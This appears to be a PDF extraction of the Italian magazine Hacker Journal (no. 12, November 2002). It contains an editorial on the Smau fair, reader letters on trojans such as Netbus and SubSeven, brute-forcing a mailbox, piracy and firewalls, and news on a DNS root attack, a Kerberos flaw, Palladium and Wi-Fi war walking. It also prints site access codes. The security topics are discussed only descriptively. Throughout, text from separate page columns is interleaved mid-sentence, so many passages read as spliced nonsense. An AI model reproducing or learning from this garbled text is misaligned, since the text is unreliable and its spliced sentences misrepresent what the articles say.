Sei sulla pagina 1di 31

hack.

er (hãk’∂r)
“Persona che si diverte ad esplorare i dettagli dei sistemi di programmazione
e come espandere le loro capacità, a differenza di molti utenti, che preferiscono
imparare solamente il minimo necessario.”

Anno 1 – N. 12
7/21 Novembre 2002 quelli che… hj
Boss: theguilty@hackerjournal.it

Publisher: ilcoccia@hackerjournal.it

C’
era il ragazzino di dodi-
Editor: grand@hackerjournal.it, ci anni che fa colazione
con pane & Linux. C’era
Graphic designer: Karin Harrop quello che ha appena cominciato, ha
Contributors: Bismark.it, Tuono Blu, un entusiasmo fuori dal comune ma
CAT4R4TTA, lupinIII, Enzo Borri ancora annaspa. C’era il security
manager molto trendy che sembra-
Publishing company va uscito dal set di uno spot di
4ever S.r.l. brut, in giacca e cravatta, e che
Via Torino, 51
20063 Cernusco S/N (MI) agli amici dice che le riviste le ha
Fax +39/02.92.43.22.35 comprate per il figlio. E c’era dav-
vero il papà, col figlio (a casa si
Printing divertono ad attaccare i rispettivi
Stige (Torino) PC). C’erano ance gli agenti della
Distributore Postale, meno antipatici del previsto; lo
Parrini & C. S.PA. sviluppatore open source; l’appassio-
00187 Roma - Piazza Colonna, 361- nato di satelliti che deve parlare col
Tel. 06.69514.1 r.a. decoder, sennò non si capisce quello
20134 Milano, via Cavriana, 14 che dice.
Tel. 02.75417.1 r.a.
Pubblicazione quattordicinale E soprattutto, tra quelli che
registrata al Tribunale di Milano il sono venuti a trovarci nello
25/03/02 con il numero 190. stand di Hacker Journal in Smau
Direttore responsabile Luca Sprea c’erano migliaia di persone.
Persone che ci. hanno fatto i
Gli articoli contenuti in Hacker
Journal hanno uno scopo prettamente complimenti per i nostri meriti e
didattico e divulgativo. L'editore ci hanno sgridato per le nostre
declina ogni responsabilita' circa pecche, hanno commentando
l'uso improprio delle tecniche e che gli articoli e fatto proposte per
vengono descritte al suo interno. migliorare HJ.
L'invio di immagini ne autorizza
implicitamente la pubblicazione A tutti quanti, e anche a
gratuita su qualsiasi pubblicazione quelli che in Smau non sono
anche non della 4ever S.r.l. potuti venire, va il nostro più pro-
fondo e sentito GRAZIE.
Copyright 4ever S.r.l.
Testi, fotografie e disegni,
pubblicazione anche parziale vietata. grand@hackerjournal.it
Realizzato con la collaborazione di
Hacker News Magazine - Groupe Hagal Arian

PS: per chi non è riuscito a passare,


nelle foto qui a fianco si può vedere il
nostro stand, tutto lamiere ondulate,
graffiti e manifesti strappati. Pareva
HJ: intasate le nostre caselle quasi che lo avessimo occupato illegal-
Ormai sapete dove e come trovarci, appena mente senza dare troppo nell’occhio.§
possiamo rispondiamo a tutti, anche a quelli
O forse era proprio così? ;-)
incazzati.
redazione@hackerjournal.it

2 | www.hackerjournal.it
o
r em vo
Sa uo la
n
di dico ì
e d !
in iove bre
G vem
OPEN SOURCE No
21

OPEN SOUR
CE
Esaltati!i à d a q u a l- quanto alla programmazione mi faccia e nell'utilizzo.

G c h e n u m e-
r o p u b b l i-
cate lettere di
hanno insegnato un linguaggio
che trovo utilissimo e che sicura-
mente tu dalla tua "superiorità"
Peraltro credo che insegnino an-
che qualche fondamento dell'uso
del pc in dos. Mi spieghi poi come
r a g a z z i c h e f r e- troverai preistorico: l'assembly. fanno a spigartelo sul win ME che
quentando la Ma proprio non riesci a capirlo non ha un vero ambiente dos, ma
scuola superiore si che non si può avere tutto e subi- solo una emulazione da console.
r i t e n g o n o i n s o d d i- to? La scuola ti mostra la via, sei Alla fine della tua lettera poi no-
sfatti dell'insegnamen- tu che poi devi approfondire e m i n i L i n u x , c o s ì , s e n z a u n c o n t e-
to ricevuto. Posso capire che la continuare da solo. sto, solo perchè fa molto cool. Se
maggior parte degli insegnanti di Un'altra lettera su cui avrei da ri- poi è vero che da tempo hai perso
informatica si siano laureati pa- dire e che mi ha spinto a scrivervi la fiducia nelle istituzioni pubbli-
recchio tempo fa e da allora non è quella di Vender apparsa sul che, devo dirti che io è da molto
hanno frequentato nessun corso numero 11. tempo che ho smesso di aver fidu-
di aggiornamento, ma bisogna Non riesco veramente a capire cia in gente come te.
anche pensare che dalla scuola perchè secondo te su un pentium La scuola cerca di avvicinare tutti
superiore non ci si possono aspet- mmx 200 si riescono ad imparare i propri alunni all'informatica di
tare argomenti di carattere infor- cose che su un p133 non ci si può base, di certo non si può preten-
matico troppo avanzati. neanche sognare. A proposito del dere che vengano spiegati i pro-
La cosa che trovo veramente irri- corso per la patente europea per tocolli di rete o come programma-
tante è la mania di onnipotenza l'uso del computer (ECDL), nessu- r e u n a b a c k d o o r o u n p o r t s c a n-
di questi ragazzi che vi scrivono. no ti costringe a farlo: insomma ner. Avete tutta questa voglia di
Sul numero 10 Mnoga affermava se non vuoi pagare per studiare imparare? Vi sentite così superio-
che nel suo istituto tecnico indu- delle cose che credi di sapere già ri rispetto agli altri? Ebbene in-
striale si trattasse limitatamente ma che probabilmente non cono- ternet è stracolma di info, tutorial
di rete e solo al quinto anno; non sci a fondo, puoi farlo benissimo e documenti vari che aspettano
contento poi aggiunge che la sua senza starti troppo a lamentare di solo che qualcuno li legga. Oppu-
scuola li costringe a "cimentarsi sentirti preso per il culo. Questa re avete solo voglia di lamentarvi
per più di un anno con programmi della patente europea è una ini- e basta? Allora la via del Lamer è
obsoleti quali il Pascal". Sul primo ziativa che ha coinvolto molte spianata innanzi a voi.
punto devo dire che anch'io ho scuole pubbliche e private italia- Se poi avete tutta questa smania
frequentato il 5° anno di istituto ne e non solo il tuo liceo per pren- di imparare da un professore
tecnico industriale lo scorso anno. dersi beffa della tua "intelligenza competente, aspettate di prende-
Di rete il prof. non ne ha neanche superiore". È comunque insoppor- re il diploma e poi iscrivetevi al-
accennato. L'argomento di teleco- tabile il modo in cui ti lamenti di l'università, poi vediamo se avete
municazioni più all'avanguardia win95: devono insegnarti ad usa- ancora voglia di lamentarvi.
che ho studiato è stato il telefono re un sistema operativo che nelle
a disco, ma non per questo mi sue varie versioni non è che sia GIANLUCA
sento offeso o sottovalutato. In cambiato poi di molto nell'inter-

UN GIORNALE PER TUTTI: SIETE NEWBIE O VERI HACKERS?


Il mondo hack è fatto di alcune cose facili e tante cose difficili. Scrivere di hac-
king non è invece per nulla facile: ci sono curiosi, lettori alle prime armi (si fa
per dire) e smanettoni per i quali il computer non ha segreti. Ogni articolo di
Hacker Journal viene allora contrassegnato da un level: NEWBIE (per chi co-
mincia), MIDHACKING (per chi c’è già dentro) e HARDHACKING (per chi man-
gia pane e worm).

www.hackerjournal.it |3
www.hackerjournal.it

mailto:
redazione@hackerjournal.it

IL ROVESCIO DELLA MEDAGLIA


Secondo me Palladium è le svolta
che Stallman, Torvalds e gli altri
aspettavano. Sarà la prova definiti-
va per il Software Libero (non solo
sviluppato con l'Open Source, ma
concesso con licenza GPL (sarebbe
ora che tutti capissero che il softwa-
re free non è gratis, ma LIBERO).
Arriverà il giorno in cui i ragazzini
invece di comprare PC preconfezio-
nati con Wincrok, assembleranno
makkine fantastike, dando poi a lo-
ro la vita con una distro GNU/Li-
nux, proprio per evitare il giogo di
Palladium e poter continuare a fare
ciò che si vuole col proprio compu-
ter. Secondo me, Palladium velociz-
zerà questo processo di evoluzione.
Finalmente zio Bill sta facendo il
"nostro gioco". Certo, ci dovremo
accontentare delle macchine che
abbiamo, ma sicuramente la mia li-
bertà di smanettare vale tutto il
nuovo hardware del mondo! =:o)
Adesso ci vuole un piccolo p.s., non
sono di certo un nemico di zio Bill, se essere suonato se non su un letto- do l'accesso ad altre persone nel
o meglio, sono conscio del fatto che re Palladium/Policeware, o se un si- mio PC.
Windows ha portato il PC nelle ca- to Web non visualizzasse testi e im- Per ovviare a tutto questo ho for-
se di tutti, compresa la mia, e che magini su browser che girano su mattato il disco fisso. Esiste la pro-
la semplificazione provoca instabi- piattaforme aperte? babilità che tuttora sia rimasta trac-
lità a ogni sistema operativo, ma Se abbastanza utenti si rifiuteranno cia dei trojan e qualcuno riesca an-
come ogni buon imprenditore (vedi di comprare film e musica o di visi- cora a farmi visita?
altri a noi + vicini… =)) zio Bill ha tare siti “non aperti”, chi produce E ancora, non aprendo alcun server
esagerato e merita una lezione, contenuti dovrà per forza piegarsi, di programmi simili, è possibile
dobbiamo farci sentire, oppure pie- per continuare ad avere un mercato. avere intrusioni da parte esterne?
garci al suo volere COSA SCEGLIE- Altrimenti, temo che bisognerà ri- Perché da quando uso la Chat ICQ,
TE ??!! nunciare a quei contenuti. il mio Norton Personal Firewall, ri-
B4dP Oppure, chissà che anche nello vela molti attacchi.
spettacolo e nell’informazione non Guido
Sicuramente anche in Microsoft han- si diffonda la tendenza dell’Open
no fatto un ragionamento simile (se Source, per la produzione di infor- Tranquillo, se hai riformattato sei a
blindiamo il sistema, la gente cam- mazione libera? posto (sempre che tu non avessi
bierà sistema), ma hanno valutato qualche virus tra i file di backup).
accuratamente il rischio. Soprattutto CHI SCHERZA COL FUOCO... Teoricamente, se non ci sono ser-
perché dalla loro parte hanno un’ar- Ultimamente ho lavorato con alcuni ver attivi, sei tranquillo, ma... l'uni-
ma molto efficace: i contenuti. Cosa programmi come Netbus e Subse- co computer sicuro è quello spento
succederà se un film rifiuterà di ve- ven, più per curiosità che per dei fi- e staccato dalla rete. Verifica di
nire riprodotto se si cerca di vederlo ni particolari. Non essendo assolu- non avere attiva la condivisione di
su un sistema non Palladium compa- tamente esperto nella materia, è fi- file e stampanti, e tieni chiuse tut-
tibile? O se un CD audio non potes- nita che mi sono infettato, favoren- te le porte che non servano a un

4 | www.hackerjournal.it
o A
em vo STAMP
LIBERAITÀ
r
Sa uo la
n
di dico ì
e d ! C
in iove bre
G vem NO PINUFBOBRLMIAZIONI
No SOLO ARTICOLI
21 E

IL CORAGGIO DI OSARE: INDIPENDENTI DA TUTTI


programma noto.

DIFENDERSI DA CHI DEFACCIA


Nuova password! MUSICA PIRATA
Volevo chiedervi se mi potete indi- Ecco i codici per accedere alla Secret Zone Volevo esprimere un parere a caldo sul vo-
care qualche sito dove posso trova- del nostro sito, dove troverete informazioni stro commento riguardante il sondaggio del
re materiale per imparare a difen- e strumenti interessanti. Con alcuni browser, sito di hj, incominciando col dire che io so-
dere il mio sito dai defacer. potrebbe capitare di dover inserire due vol- no tra quelli che hanno risposto che il soft-
Francesco88 te gli stessi codici. Non fermatevi al primo ware lo avrebbe copiato ugualmente in
tentativo. quanto è la verità. Ma quando ho letto il vo-
Non esiste un singolo documento
che risolva tutti i problemi. L'argo- user: 3ccia stro commento mi è dispiaciuto per esempio
per i nuovi gruppi emergenti e ho tentenna-
mento dell'integrità di un sito Web si
inserisce nella sicurezza del server
pass: ris8 to, ma poi ci ho ripensato. Ho deciso che
sopra agli introiti dei dischi ci avreb-
più in generale, e dipende da tantis- bero mangiato enti più potenti come la
simi fattori: la piattaforma utilizza- Siae, lo Stato, le casa discografiche o le
ta, i servizi attivi su di essa, il Web- Purtroppo non esiste una versione in grandi Multinazionali e qui sono tornato
server e il suo grado di aggiorna- Italiano di ZoneAlarm (non si può sui miei passi. Non pago la musica perché
mento, i CGI e gli script utilizzati... fare a meno di conoscere l’inglese non voglio dare soldi a loro.
Inoltre, queste informazioni cambia- se si vuole fare qualcosa in questo JINKO
no di giorno in giorno. campo). Noi abbiamo pubblicato
Mi sa che ti tocca studiare, e tanto, una guida di base alla impostazione Mah, c’è gente che non compra benzina Shell
oppure rivolgerti a un esperto. di ZoneAlarm sul n. 5 (la trovi nella né prodotti Nestlè per protesta contro le scel-
sezione Arretrati del nostro sito). Se te di quelle aziende, ma non per questo as-
THE FIREWALL IS ON THE TABLE però apri Google.it e inserisci le pa- salta distributori né ruba il cioccolato al su-
Recentemente ho installato Zone role “guida zonealarm”, e spunti permercato.
Alarm Pro 3.1.395 e, dato che non “Cerca le pagine nella categoria Ita-
so l'inglese, non riesco a utilizzarlo. liano” troverai svariate altre guide. Nel sondaggio in cui ci domandavate quan-
Quindi mi chiedevo se esiste una to eravamo disposti a spendere per un CD
versione tradotta, o se mi segnala- TV ANTI HACKER scaricato da internet io ho risposto 6 . Poi,
ste qualche guida o meglio ancora Sono uno studente come tanti, e la nella rivista, ci avete chiesto di motivarlo. I o
se voi pubblichereste una guida sicurezza informatica mi appassio- penso che 6 _ siano un prezzo più che
dettagliata! na moltissimo! Oggi a pranzo stavo onesto per un CD. Pensate cosa com-
achers58 guardando un cartone animato su priamo con quei soldi: 4 cappuccini al
mattino. Non mi pare che sia chiedere
troppo rinunciare a quattro cappuccini
al mattino per poter avere un CD di musi-
ca. Se poi pensiamo che scaricandolo pos-
siamo anche magari scegliere le canzoni il
prezzo mi sembra abbastanza misero: in uno
dei CD da 20-30? che compriamo media-
mente ci sono 2 canzoni belle 3-4 mediocri
e le altre non le ascoltiamo se non la prima
volta. Se per ascoltare 2-3 canzoni di un
cantante mediocre dobbiamo spendere
l'equivalente di 50.000 delle vecchie li-
re mi sembra una rapina, ma chiedere
a un cantante professionista, che scrive
e suona belle canzoni di "regalarci" un
CD da un'ora di musica mi sembra ru-
bare, allo stesso modo.
GOGETA SSJ4

Più che altro, noi volevamo una risposta da


chi, come JiNKo, non pagherebbe nemmeno
la metà del prezzo che tu ritieni giusto.

www.hackerjournal.it |5
Italia 1 (Per la precisione si trattava

LA NEWSLETTER DI di Conan) e sono rimasto deluso


dalla definizione che veniva dato
degli hackers: "persone senza scru-
poli che si introducono nei compu-

HACKERJOURNAL.IT ter per rubare dati o per inserirci


dei virus". Ma ci siamo impazziti??
Spero che la maggior parte della
gente che ha visto il cartone rifletta
sulla frase citata: se questo è quel-
lo che si pensa degli hackers, tutti
gli sforzi compiuti da molte perso-
ne sono stati vani! Un hacker non
fa queste cose; un hacker (come
viene definito nel "Jargon File") è
un programmatore entusiasta, che
è convinto che la condivisione del-
le informazioni sia un bene positi-
vo ed efficace, e che sia un "dove-
re etico" condividere le proprie
competenze scrivendo free softwa-
re (questa è figura un po' utopica,
ma affascinante). Gli hacker non
sono pirati che rubano dati, al loro
lavoro si deve anche la creazione
del pc e del modem, l'affermazione
di Internet, e molte altre innovazio-
ni tecnologiche!
by

by
e Posta e secret zone
imbizzarrite?
Nelle scorse settimane, i moduli di autenti-
cazione della Secret Zone e per la lettura via
Web delle caselle con indirizzo @hacker-
journal.it hanno avuto qualche problema. In
alcuni casi, infatti, invece di mostrare la pa-
gina protetta, il server segnalava un errore.
A oggi, il problema sembra essere stato ri-
solto, e non dovrebbe presentarsi più.
Ricordiamo che la Secret Zone e la pagina
per registrare gratuitamente una casella
@hackerjournal.it sono accessibili con i codi-
ci che si trovano a pagina 5.

D
al nostro sito è possibile iscriversi alla newsletter ,
grazie alla quale potrai conoscere tutte le novità re-
lative al sito e alla rivista. La newsletter viene spe-
dita ogni due settimane, il mercoledì. Su ogni edizione
della newsletter vengono elencati gli argomenti trattati
sul numero di Hacker Journal che troverai in edicola dal
giorno dopo, sapere quali novità ci sono sul sito e rima-
nere sempre aggiornato sulle nostre iniziative.
Per iscriversi basta inserire il proprio indirizzo email dal-
la home page di www.hackerjournal.it.

6 | www.hackerjournal.it
A
STAMP
S a
mo
re vo
o
nu cola
LIBERAITÀ
C
i
d di
e dì
in iove bre
! NOOPINUFBOBRLMIAZIONI
L
SO L OLI
G vem E ARTIC
No
21

IL CORAGGIO DI OSARE: INDIPENDENTI DA TUTTI


Proprio per evitare di essere confu- senza sdoppiatori, prolunghe o volta. In fin dei conti, sto solo cer-
si con coloro che penetrano nei si- giunzioni. Se è lontano, fatti fare un cando di violare la mia casella, no?
stemi informatici solo per provoca- cavo ad hoc della lunghezza giusta Gianluca
re danni, gli hacker hanno comin- (qualsiasi negozio di telefonia può
ciato a chiamare “cracker”, ma mi fartelo con una spesa modesta). Se Non proprio. Anche se lo scopo è
rendo conto che non è servito a neanche così riesci a ottenere qual- quello di ottenere accesso a una ca-
molto!! Queste sono parole dette e che risultato, significa che la linea sella che è intestata a te, ti troveresti
ripetute più volte, lo so, ma se ac- Telecom è molto disturbata, magari comunque a effettuare un attacco a
cadono ancora certi eventi, qual- perché vivi lontano dalla centrale un computer che appartiene ad altri
cosa bisogna fare per cercare di più vicina, e non c’è molto da fare (il provider), e questo non è lecito.
cambiare l'opinione pubblica sugli (se non segnalare il problema a Te- Inoltre, l’attacco a forza bruta po-
hackers, persone non da criticare lecom e sperare che se ne occupi). trebbe sovraccaricare le risorse del
ma da ammirare e lodare. server o provocare errori di varia na-
MaNwE POSSO AUTO-ATTACCARMI? tura, cosa che peggiorerebbe le cose.
Qualcuno ha rubato la password La cosa migliore da fare è quella di
Che vuoi che ti dica: io sto leggen- della mia casella di posta elettroni- contattare il provider e farsi resettare
do “Hackers Diaries, confessioni di ca, e la ha persino modificata, in la password. Il tutto è molto più sem-
giovani hacker”, e nonostante l’au- modo che ora io non riesco ad ac- plice se, all’atto dell’abbonamento,
tore sia stato in contatto con questo cedere alla mia casella mentre in- hai fornito i tuoi dati veri; se invece
mondo per scrivere il suo libro, usa vece lui può leggere tutti i messag- hai dato una falsa identità, per il pro-
indiscriminatamente la parola hac- gi che mi vengono inviati. Volevo vider è difficile capire se stai dicendo
ker per descrivere script kiddies, chiedervi se posso legalmente usa- la verità, o se invece sei un malinten-
defacer e ogni sorta di lameroni. re un programma per effettuare un zionato che vuole sottrarre la pas-
attacco a forza bruta per scoprire la sword al legittimo proprietario.
MODEM LENTO nuova password e cambiarla a mia
Volevo chiedere se è possibile ta-
roccare una normale linea del tele-
fono e/o un normale modem 56K
per viaggiare un po’ più veloce e
metterci qualche minuto meno a
scaricare. Vi chiedo ciò perché ho
un 56K ma mi si collega a 31.200
bps, e di conseguenza scarico a
non più di 3 Kb/s. Non dico di ar-
rivare a velocità altissime, ma al-
meno da scaricare a 4 o 5 Kb/s.
Niger

Innanzi tutto, dovresti assicurarti di


avere aggiornato il firmware del
modem alla versione più recente
(V.92 o V.90 almeno), visitando il
sito del produttore e scaricando gli
eventuali aggiornamenti (occhio a
seguire attentamente le istruzioni,
potresti rovinare il modem se qual-
cosa andasse storto). In seguito, as-
sicurati di aver selezionato un dri-
ver appropriato e aggiornato, e non
una impostazione generica.
Se tutto questo è a posto, l’unica
cosa che rimane da fare è control-
lare la linea. Il modem dovrebbe ar-
rivare direttamente alla presa Tele-
com principale, con un unico cavo

www.hackerjournal.it |7
news
HOT! ! SMAU: I GRANDI ASSENTI

uest’anno Smau aveva il sapore un’opera teatrale di Beckett. Come in Aspettando Godot, i veri
! CIAO PAUL
Il senatore americano Paul Wellstone,
paladino del diritto alla privacy, è morto in un
Q protagonisti sono gli assenti. Non si parla d’altro che del fatto che questo o quel marchio
quest’anno hanno preferito disertare la più importante manifestazione informatica italiana, di
quelli che non hanno più i soldi per parteciparvi (principalmente i portali Internet) o di quelli che
incidente aereo venerdì 25 ottobre. Tra le sue –pace all’anima loro, e a quella dei dipendenti licenziati– non sono più in attività.
più recenti battaglie, va ricordata quella contro Forse per mettere in chiaro come stanno le cose,
le compagnie telefoniche, per impedire a esse e per evitare di essere classificati nelle ultime
di “mettere in vendita” i dati personali del loro due categorie, alcune aziende hanno preferito
utenti (registro delle chiamate effettuate e precisare i motivi della propria assenza. Acer (il
ricevute compreso). più grande produttore di notebook al mondo, e
tra i più importanti produttori hardware in
generale) ha diffuso un comunicato stampa in
cui afferma di aver preferito investire quei soldi
in campagne pubblicitarie e attività Internet.
Sony invece ha mostrato l’artiglieria del
reparto marketing della sua Playstation,
tappezzando Milano di manifesti la cui scritta
è inequivocabile: “Siamo fuori: fuori da Smau,
fuori dagli schemi”. La mancanza di Sony e
della Playstation fa ancora più rumore, perché si
manifesta proprio nell’anno in cui Smau ha finalmente preso coscienza (con qualche
anno di ritardo) del fatto di essersi trasformata da manifestazione per utenti professionali in
fenomeno di massa. Proprio nell’anno in cui Smau punta sull’intrattenimento, sfoderando un
poderoso Italian Lan Party con 1200 postazioni di gioco collegate in rete, il colosso del divertimento
elettronico snobba la manifestazione, e le fa pure le linguacce dai suoi manifesti.

! ATTACCO AL CUORE DELLA RETE


! FALLA CRITICA IN
l 21 ottobre scorso, i principali server DNS di Apparentemente, l’attacco è stato portato con
KERBEROS
La versione 4 del demone di compatibilità del
sistema di autenticazione Kerberos
I Internet sono stati sottoposti a un attacco di
tipo Denial of Service. Nonostante solo 5 tra i
13 DNS server root hanno continuato a
un enorme flood di pacchetti ICMP, cosa che
–fortunatamente– denota una scarsa
competenza del cracker. Un attacco di pari
(kadmind4) è sensibile a un attacco buffer funzionare, solo pochi utenti hanno potuto entità ma portato da una persona con maggiori
overflow, che potrebbe obbligare il sistema percepire qualche problema o hanno subìto competenze tecniche, avrebbe potuto abbattere
attaccato a utilizzare una vecchia e meno qualche rallentamento. I server DNS funzionano tutti e 13 i server, con pesanti conseguenze sul
sicura versione di Kerberos. In questo modo, come una “rubrica telefonica” di Internet, traffico dell’intera Rete.
un attaccante potrebbe ottenere accesso non traducendo in indirizzi IP numerici le richieste Da anni si afferma che i server DNS sono il vero
autorizzato al sistema e alle sue chiavi. effettuate dagli utenti tramite indirizzi tallone di Achille della rete, in parte per la loro
Ulteriori informazioni e patch sono su mnemonici (tipo hackerjournal.it). Ogni provider organizzazione gerarchica (da pochi root server
www.ciac.org/ciac/ ha un suo DNS, ma tutti vengono sincronizzati e dipende lo smistamento degli indirizzi in tutto il
bulletins/n-009.shtml aggiornati attraverso i server centrali, proprio mondo), e in parte per le debolezze del software
quelli messi sotto attacco. Bind, utilizzato da tutti i server.
! SI MOLTIPLICANO I
SITI WIRELESS ! WI-FI: AVANTI CON GIUDIZIO
Anche in Italia si moltiplicano i siti che
offrono informazioni sulle reti Wi-Fi. Dopo inora, secondo la legge italiana, le reti la direttiva dell'Unione Europea che chiedeva di
Airgate.it e OnWireless.it, è nato anche
www.securitywireless.info,
che si propone di esplorare il territorio della
F wireless Wi-Fi si potevano utilizzare solo in
ambito privato (casa, ufficio, piccoli locali)
ma non come tecnologia di accesso a Internet
liberalizzare l'offerta al pubblico delle
connessioni Wi-Fi.
Ora, il Ministro Gasparri ha annunciato che chi
fragile sicurezza delle WLan. Al momento in rivolta a un vasto pubblico. Probabilmente per vorrà potrà sperimentare l’accesso Wi-Fi, ma
cui scriviamo, il sito è ancora un po’ povero non fare uno sgarbo agli operatori di telefonia solo su aree limitate e senza scopo di lucro.
di materiali, ma contiamo che presto si che avevano pagato a caro prezzo le licenze per Quale provider si metterà a installare punti di
riempirà di notizie, tutorial e documentazione la tecnologia UMTS, il governo aveva fino a oggi accesso wireless non sapendo se potrà mai
tecnica. cercato di prendere tempo, evitando di ratificare ricavare un centesimo dall’operazione?

8 | www.hackerjournal.it
news

! MICROSOFT BEFFATA SU PALLADIUM


HOT!
er tranquillizzare i paladini della privacy e l'uso della tecnologia Palladium; una per

P dell’open source, durante l’undicesimo


USENIX Security Symposium tenutosi in
agosto, il project manager del progetto
proteggere il SW e l’altra per imporre il rispetto
delle licenze. Pare incredibile, ma sembra che
questo potrà bloccare l'utilizzo di Palladium fino
! PC SMILE RADDOPPIA
palladium, Peter Biddle, ha dichiarato che a quando Lucky Green non deciderà di dare in È in edicola il secondo numero di PC Smile,
Palladium serve al controllo dei contenuti licenza il suo brevetto, magari a MS. la rivista con CD allegato con una raccolta
multimediali e non è un sistema di controllo A quanto pare, Lucky Green non ha nessuna del materiale più divertente, pazzo ed
per il software. In particolare, ha affermato che intenzione di farlo, e vedremo quando si esilarante di Internet: foto bizzarre, filmati,
le software house non possono usare scatenerà la battaglia legale e i dollari animazioni, barzellette, finti virus e sfondi
Palladium per proteggere il software dai pirati, inizieranno a piovere se Green sarà in grado di sexy per il tuo desktop.
o per obbligare gli utenti a rispettare la licenze resistere all'attacco. Se, come ha dichiarato,
del software. A questo punto Lucky Green, Microsoft non ha effettivamente intenzione di
(www.cyberpunks.to) ha immediatamente usare Palladium per questi scopi, non cambierà
compilato due richieste di brevetto riguardanti nulla, ma chissà perché, noi non ci crediamo.

! POLICEWARE ALL’ORIZZONTE
na nuova minaccia si abbatte sul fronte ascoltarli con lettori portatili. Per rincarare la

U del software open source e su tutti noi in


generale. Il CBDTPA, (Consumer
Broadband and Digital Television Promotion
dose, la legge prevede nuove pene per chi
infrange le limitazioni: fino a cinque anni
prigione federale e una multa di 500.000 dollari.
Act) è una proposta di legge che come recita il Pensate che potreste aggirare la legge
titolo, serve "per regolare il commercio (lo rimuovendo il policeware dal vostro personal
scambio) da uno stato all'altro con determinati computer? Meglio ripensarci… : chiunque
dispositivi, installando nel settore privato delle elimini il dispositivo governativo disabilitando o
tecnologie e misure di protezione che dovranno modificando il policeware sul loro proprio
essere implementate e fatte rispettare dalle calcolatore, a casa propria o in ufficio,
leggi federali per proteggere il materiale digitale rischierebbe cinque anni di carcere.
e per promuovere la banda larga ed aiutare la Molto probabilmente i sistemi operativi
transizione alla televisione digitale e per altri alternativi come Linux e FreeBSD rifiuterebbero ! KOURNIKOVA:
scopi.". La descrizione appare abbastanza di inserire il policeware nel loro codice… tempi 6-0, 6-0
contorta, anche nella sua versione in legalese duri anche per loro: "usi Linux? In galera pure
americano… tu!" Jan de Wit, alias OnTheFly, autore del
La legge obbligherebbe a montare un Per informazioni: malefico worm Anna Kournikova è stato
dispositivo di protezione (policeware), www.stoppoliceware.org condannato anche nel processo di appello.
approvato dal governo, in tutti i nuovi PC e Consegnatosi sponteamente alla polizia, il
dispositivi domestici digitali (lettori CD, DVD, 22enne danese rischia ora di passare un po’
MP3, decoder...) di intrattenimento di tempo in carcere.
venduti negli Stati Uniti.
Questo policeware limiterebbe la
possibilità di fruire del materiale
protetto da copyright, vietando ! REUTERS PIRATA?
alcune delle operazioni che si
possono compiere e persino La prestigiosa agenzia di stampa Reuters è
tenendo un registro delle operazioni stata accusata di essersi intrufolata nei
compiute per la successiva sistemi informatici del gruppo svedese
ispezione. È abbastanza evidente Intentia, allo scopo di ottenere dati finanziari
che, accanto alla pirateria, questo della società prima della loro pubblicazione
potrebbe limitare parecchie operazioni ufficiale. Nelle scorse settimane, gli scarsi
legittime, come la copia (o la risultati finanziari del terzo trimestre di
conversione in altri formati) di opere Intentia erano divenuti pubblici prima della
multimediali regolarmente acquistate. dichiarazione ufficiale di bilancio; a seguito di
In parole povere, diventerebbe un’investigazione interna, Intentia ha potuto
impossibile rippare dei CD per verificare che quei dati erano stati scaricati
realizzare una compilation dei propri illegalmente da un indirizzo IP appartenente a
brani preferiti, o archiviare MP3 per Reuters. Pessime news, davvero.

www.hackerjournal.it |9
news
HOT! ! RETI APERTE IN SMAU… O FORSE NO?

BlackHats (blackhats.it), noto gruppo di Il giorno della presentazione dei risultati, allo
! DIVX E MPEG4
SULLA TELEVISIONE I esperti di sicurezza tuttiprovenienti da ex
ambienti hacker, presentano i risultati di una
sessione di war walking effettuata all'interno
stand Microsoft è stato lanciato un allarme:
qualcuno avrebbe provato ad attaccare la rete
wireless del colosso del software. Tutti i sistemi
La scandinava Kiss Technology (www.kiss- della mostra per cercare falle di sicurezza nelle sono stati spenti ed è stata fatta intervenire la
technology.com), in collaborazione con DivX reti WI.FI. In una sessione di soli 15 minuti polizia postale. Il giorno dopo, la connettività è
Networks, ha presentato un lettore di DVD da effettuata passando dall'interno di un padiglione stata assicurata con i vecchi, tradizionali,
tavolo dalle caratteristiche uniche. Oltre a a una strada per entrare nel padiglione rassicuranti cavi. Mentre si spargeva la voce
poter leggere DVD, Video CD e SVCD, CD successivo, sono state rilevate 80 postazioni sulle possibili, gravissime conseguenze
Audio, CD dati con file Mp3, questo wireless tra terminali e stazioni base; tra dell’attacco, sulle tecniche utilizzate e sui
“mangiatutto” è in grado di riprodurre anche queste, 58 sono risultate non protette e possibili “esecutori”, noi scambiando quattro
filmati in formato MPEG-4 e DivX, con codec accessibili alla navigazione, mentre 22 erano chiacchiere con un dipendente Microsoft
delle versioni 4 e 5. Il prezzo del KiSS DP-450 protette dal sistema di cifratura e abbiamo saputo come sono andate veramente
(questo il nome del lettore) si aggirerà sui autenticazione WEP (peraltro, piuttosto debole). le cose: non si è affatto trattato di un attacco,
400 € più IVA. Gli strumenti utilizzati sono stati un PC portatile, ma di una semplice interferenza con uno stand
una scheda Wi-Fi e un'antenna omnidirezionale vicino, che però ha fatto scattare il campanello
da 2 Db di guadagno. di allarme in casa Microsoft.

! MICROSOFT COPIA ANCHE LA PUBBLICITÀ

n America furoreggia la campagna cambiato a Microsoft dopo otto anni di uso del

I pubblicità "Switch" di Apple


(www.apple.com/it/switch/). In queste
pubblicità vari professionisti, e uomini e
Mac e che cambiare era stato facile, come le
era stato promesso. Il problema è nato dopo
che su Slashdot (www.slashdot.org) la donna
donne della strada, parlano del perché della fotografia è stata identificata come una
hanno abbandonato la piattaforma modella utilizzata per delle foto di archivio,
Microsoft a favore di quella Apple. disponibili a tutti e distribuite dall'agenzia Getty
Questa campagna ha avuto un successo Images (www.gettyimages.com), foto
tale che Microsoft ha sentito il bisogno di disponibile anche per voi a partire da 49.95 $.
mostrare che esistevano anche persone Questo ha ovviamente contribuito a rendere
che cambiavano da Apple a Microsoft. tutta la sua storia chiaramente poco credibile.
Peccato che, mentre Apple ha usato all'interno Microsoft ha immediatamente tolto l'annuncio
della sua campagna persone "vere" e, potenza dei potenti, ha anche fatto cancellare
identificandole con nome e cognome, Microsoft le tracce dalla pantagruelica cache di Google!!!
! I NUMERI 899 ORA non è andata oltre a un paio di dettagli personali Tra l'altro all'interno del file che Microsoft
dicendo che la "pentita" era alta 5 piedi e 3 proponeva di riempire per i convertiti, compare
SI DISABILITANO GRATIS pollici (circa 1.72 m) che aveva affittato una un nome interessante: Mallinson, come autrice
Finora Telecom si era rifiutata di disabilitare, Lexus, faceva la scrittrice freelance ed era del template che la Microsoft proponeva ai
su richiesta dell’intestatario della linea sposata ad un uomo alto 6 piedi (circa 1.98 m). potenziali convertiti.
